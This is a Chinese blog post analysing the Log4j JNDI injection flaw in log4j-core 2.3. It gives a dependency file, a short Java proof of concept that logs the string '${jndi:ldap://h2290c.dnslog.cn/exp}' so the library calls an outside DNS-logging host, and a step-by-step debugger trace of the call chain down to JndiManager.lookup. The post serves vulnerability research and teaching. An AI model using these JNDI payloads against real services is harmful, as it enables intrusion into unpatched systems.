Log4j漏洞分析
|
254
|
0
|
代码审计

751 字
|
4 分钟

对于N Day漏洞如何自己找到它的利用链呢?我的方法是,先搞一个POC,直接下断点开始调试。一开始不必关注代码逻辑,一直单步运行,当发现漏洞触发了,如得到了DNS回显或者弹出了计算器,在这行代码处下断点,接着重新进行调试。不断循环,就可以找到导致漏洞触发的代码点。这时再根据审计工具如IDEA里的调用链有的放矢的分析代码执行流程。

pom文件

    <dependencies>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.3</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.3</version>
        </dependency>
            <groupId>com.unboundid</groupId>
            <artifactId>unboundid-ldapsdk</artifactId>
            <version>6.0.0</version>
        </dependency>
    </dependencies>

log4j POC

package top.hanjiefang;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4Test {
    private static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
       // String urlldap = "${jndi:ldap://127.0.0.1:9999/}";
       // String urlRmi = "${jndi:rmi://127.0.0.1:1099/exp1}";
        String urlDns = "${jndi:ldap://h2290c.dnslog.cn/exp}";

        logger.error(urlDns);
        }
    }

在logger.error(urlldap)处下断点,不断步进,这几步都是不断在调用log相关方法。最终来到org/apache/logging/log4j/core/config/LoggerConfig.java#log()

log()方法在对日志进行过滤后,调用callAppenders(event)方法将日志事件传递给日志附加器(Appenders),以便将日志事件输出到不同的目标,比如文件、控制台、数据库等。

在org/apache/logging/log4j/core/config/AppenderControl.java#callAppender()方法中,先做了一系列检查,调用附加器的 append(event) 方法来将日志事件添加到附加器中。

append()调用 getLayout() 方法获取附加器的布局(Layout),然后使用该布局将日志事件转换为字节数组。布局定义了日志事件的输出格式。

在toByteArray里调用了toSerializable方法,他将日志事件转化为可序列化字符串的方法。它遍历formatters对象,将日志事件格式化为字符串。

formatters列表共有11个对象。问题出在第8个,MessagePatternConverter。调试代码,在循环到第八次时跟进formatter.format(event, buf);

converter.format(event, buf)调用转换器的format进行格式化

format()进行了一些检查。如果存在 config 对象,并且消息中包含 ${(表示可能包含占位符),则会使用 config 对象的字符串替代器(StrSubstitutor)来替代占位符。这是一种字符串替换操作,可以用来动态地替换占位符中的值。之后将格式化后的消息追加到 toAppendTo 中。

跟进replace方法,进行一些检查后调用substitute()方法进行替代操作。

org/apache/logging/log4j/core/lookup/StrSubstitutor.java#substitute()方法很长,是一个递归方法,执行字符串中的占位符替换操作。

处理过程会进入resolveVariable()方法,这里就看到期待已久的lookup方法了。

因为event不为空,进入lookup.lookup(event, name)方法。

先 调用JndiManager.getDefaultManager()获取一个JndiManager。

再调用jndiManager.lookup()查找指定名称的 JNDI 资源。

到这,漏洞就触发了。

最后附上完整调用链

log4j利用链
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
						

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇